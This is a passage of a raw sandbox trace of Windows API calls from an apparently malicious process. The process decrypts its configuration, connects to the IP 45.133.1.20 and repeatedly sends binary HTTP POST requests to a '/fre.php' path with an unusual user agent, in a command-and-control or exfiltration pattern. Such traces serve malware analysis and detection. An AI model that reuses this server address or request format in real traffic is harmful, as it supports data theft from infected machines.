45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0277.316] GetProcessHeap () returned 0x6a0000 [0277.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba770 [0277.316] GetProcessHeap () returned 0x6a0000 [0277.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0277.316] GetProcessHeap () returned 0x6a0000 [0277.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0277.316] GetProcessHeap () returned 0x6a0000 [0277.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0277.317] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0277.318] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0277.318] GetProcessHeap () returned 0x6a0000 [0277.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0277.318] GetProcessHeap () returned 0x6a0000 [0277.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0277.319] send (s=0x9f4, buf=0x6bd460*, len=242, flags=0) returned 242 [0277.319] send (s=0x9f4, buf=0x6bb998*, len=159, flags=0) returned 159 [0277.319] GetProcessHeap () returned 0x6a0000 [0277.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0277.319] recv (in: s=0x9f4, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0277.388] GetProcessHeap () returned 0x6a0000 [0277.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0277.389] GetProcessHeap () returned 0x6a0000 [0277.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0277.390] GetProcessHeap () returned 0x6a0000 [0277.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba770 | out: hHeap=0x6a0000) returned 1 [0277.391] GetProcessHeap () returned 0x6a0000 [0277.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0277.391] closesocket (s=0x9f4) returned 0 [0277.392] GetProcessHeap () returned 0x6a0000 [0277.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0277.392] GetProcessHeap () returned 0x6a0000 [0277.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0277.392] GetProcessHeap () returned 0x6a0000 [0277.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0277.393] GetProcessHeap () returned 0x6a0000 [0277.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0277.394] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1788) returned 0x9f4 [0277.397] Sleep (dwMilliseconds=0xea60) [0277.399] GetProcessHeap () returned 0x6a0000 [0277.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0277.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.400] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.411] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0277.424] GetProcessHeap () returned 0x6a0000 [0277.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0277.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.425] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0277.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.427] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.428] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.428] GetProcessHeap () returned 0x6a0000 [0277.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0277.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.430] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0277.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.431] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0277.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.446] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0277.446] GetProcessHeap () returned 0x6a0000 [0277.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0277.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.447] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0277.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.448] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0277.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.450] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0277.450] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.451] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0277.451] GetProcessHeap () returned 0x6a0000 [0277.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0277.451] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0277.451] GetProcessHeap () returned 0x6a0000 [0277.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0277.454] GetProcessHeap () returned 0x6a0000 [0277.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0277.454] GetProcessHeap () returned 0x6a0000 [0277.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0277.455] GetProcessHeap () returned 0x6a0000 [0277.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0277.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.456] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.463] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0277.500] GetProcessHeap () returned 0x6a0000 [0277.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0277.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.501] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0277.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.505] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.506] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.506] GetProcessHeap () returned 0x6a0000 [0277.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0277.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.508] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0277.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.509] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0277.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.510] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0277.510] GetProcessHeap () returned 0x6a0000 [0277.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0277.511] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.511] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0277.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.512] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0277.513] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.513] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0277.517] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.517] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0277.517] GetProcessHeap () returned 0x6a0000 [0277.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0277.517] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0277.517] GetProcessHeap () returned 0x6a0000 [0277.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0277.517] socket (af=2, type=1, protocol=6) returned 0x9f8 [0277.519] connect (s=0x9f8, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0277.546] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0277.546] GetProcessHeap () returned 0x6a0000 [0277.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0277.546] GetProcessHeap () returned 0x6a0000 [0277.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0277.548] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0277.549] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0277.549] GetProcessHeap () returned 0x6a0000 [0277.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba0b0 [0277.549] GetProcessHeap () returned 0x6a0000 [0277.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0277.550] GetProcessHeap () returned 0x6a0000 [0277.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0277.550] GetProcessHeap () returned 0x6a0000 [0277.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0277.550] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0277.551] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0277.551] GetProcessHeap () returned 0x6a0000 [0277.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0277.551] GetProcessHeap () returned 0x6a0000 [0277.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0277.552] send (s=0x9f8, buf=0x6bd460*, len=242, flags=0) returned 242 [0277.552] send (s=0x9f8, buf=0x6bb998*, len=159, flags=0) returned 159 [0277.552] GetProcessHeap () returned 0x6a0000 [0277.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0277.553] recv (in: s=0x9f8, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0277.620] GetProcessHeap () returned 0x6a0000 [0277.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0277.621] GetProcessHeap () returned 0x6a0000 [0277.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0277.621] GetProcessHeap () returned 0x6a0000 [0277.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba0b0 | out: hHeap=0x6a0000) returned 1 [0277.622] GetProcessHeap () returned 0x6a0000 [0277.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0277.622] closesocket (s=0x9f8) returned 0 [0277.623] GetProcessHeap () returned 0x6a0000 [0277.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0277.623] GetProcessHeap () returned 0x6a0000 [0277.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0277.624] GetProcessHeap () returned 0x6a0000 [0277.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0277.625] GetProcessHeap () returned 0x6a0000 [0277.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0277.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x178c) returned 0x9f8 [0277.627] Sleep (dwMilliseconds=0xea60) [0277.629] GetProcessHeap () returned 0x6a0000 [0277.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0277.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.630] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0277.653] GetProcessHeap () returned 0x6a0000 [0277.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6da490 [0277.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.654] CryptImportKey (in: hProv=0x6bef48, pbData=0x6da490, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0277.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.655] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.657] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.657] GetProcessHeap () returned 0x6a0000 [0277.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da490 | out: hHeap=0x6a0000) returned 1 [0277.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.659] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0277.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.660] CryptDestroyKey (hKey=0x6ad560) returned 1 [0277.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.661] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0277.661] GetProcessHeap () returned 0x6a0000 [0277.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0277.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.667] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0277.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.668] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0277.672] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.673] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0277.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.674] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0277.674] GetProcessHeap () returned 0x6a0000 [0277.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0277.674] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0277.674] GetProcessHeap () returned 0x6a0000 [0277.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0277.675] GetProcessHeap () returned 0x6a0000 [0277.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0277.675] GetProcessHeap () returned 0x6a0000 [0277.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0277.676] GetProcessHeap () returned 0x6a0000 [0277.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0277.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.677] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.687] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0277.698] GetProcessHeap () returned 0x6a0000 [0277.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0277.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.699] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0277.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.700] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.702] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.702] GetProcessHeap () returned 0x6a0000 [0277.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0277.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.704] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0277.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.705] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0277.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.706] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0277.706] GetProcessHeap () returned 0x6a0000 [0277.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0277.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.707] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0277.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.709] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0277.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.710] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0277.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.711] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0277.711] GetProcessHeap () returned 0x6a0000 [0277.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0277.711] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0277.715] GetProcessHeap () returned 0x6a0000 [0277.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0277.715] socket (af=2, type=1, protocol=6) returned 0x9fc [0277.716] connect (s=0x9fc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0277.739] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0277.739] GetProcessHeap () returned 0x6a0000 [0277.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0277.739] GetProcessHeap () returned 0x6a0000 [0277.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0277.740] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0277.741] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0277.741] GetProcessHeap () returned 0x6a0000 [0277.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba3b0 [0277.741] GetProcessHeap () returned 0x6a0000 [0277.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0277.742] GetProcessHeap () returned 0x6a0000 [0277.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0277.742] GetProcessHeap () returned 0x6a0000 [0277.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0277.743] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0277.744] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: 